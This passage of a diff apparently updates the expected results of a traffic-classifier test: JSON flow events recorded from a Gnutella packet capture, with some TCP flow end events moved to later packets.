+00913{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":126831,"flow_last_seen":130215,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10878,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.225.140.186","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":72851,"flow_last_seen":72851,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.225.140.186","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3842,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":71538,"flow_last_seen":71538,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":252577,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.39.154.69","src_port":28681,"dst_port":4832,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1796,8 +1796,6 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"120.156.204.38","src_port":28681,"dst_port":54832,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82064,"flow_last_seen":82064,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.73.129.26","src_port":28681,"dst_port":53585,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82064,"flow_last_seen":82064,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.73.129.26","src_port":28681,"dst_port":53585,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82066,"flow_last_seen":82066,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.242.191.215","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82066,"flow_last_seen":82066,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.242.191.215","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82066,"flow_last_seen":82066,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.249.64.215","src_port":28681,"dst_port":25058,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1808,22 +1806,16 @@ 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82064,"flow_last_seen":82064,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"208.92.106.151","src_port":28681,"dst_port":32476,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82059,"flow_last_seen":82059,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.157.59.43","src_port":28681,"dst_port":56919,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82059,"flow_last_seen":82059,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.157.59.43","src_port":28681,"dst_port":56919,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83519,"flow_last_seen":83519,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.159.27.22","src_port":28681,"dst_port":17563,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83519,"flow_last_seen":83519,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.159.27.22","src_port":28681,"dst_port":17563,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82063,"flow_last_seen":82063,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.195.105.243","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82063,"flow_last_seen":82063,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.195.105.243","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82061,"flow_last_seen":82061,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"178.51.146.115","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82061,"flow_last_seen":82061,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"178.51.146.115","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82062,"flow_last_seen":82062,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.182.44.202","src_port":28681,"dst_port":30277,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82062,"flow_last_seen":82062,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.182.44.202","src_port":28681,"dst_port":30277,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82060,"flow_last_seen":82060,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.74.159.56","src_port":28681,"dst_port":29271,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82060,"flow_last_seen":82060,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"196.74.159.56","src_port":28681,"dst_port":29271,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":50191,"dst_port":6778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.29.197.138","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.29.197.138","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3962,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":83517,"flow_last_seen":83517,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":261823,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.120.146","src_port":28681,"dst_port":12838,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
@@ -1901,10 +1893,18 @@ 00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":305,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":93713,"flow_last_seen":93713,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.168.175.31","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":323,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":56070,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
+00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":50193,"dst_port":46010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00575{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00560{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":322,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95923,"flow_last_seen":95923,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.219","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61974,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.140.63.147","src_port":50190,"dst_port":29545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00576{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95754,"flow_last_seen":95754,"flow_idle_time":180000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"71.237.202.91","src_port":28681,"dst_port":16117,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00555{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":61975,"flow_last_seen":149634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.65.87.24","src_port":50192,"dst_port":16201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 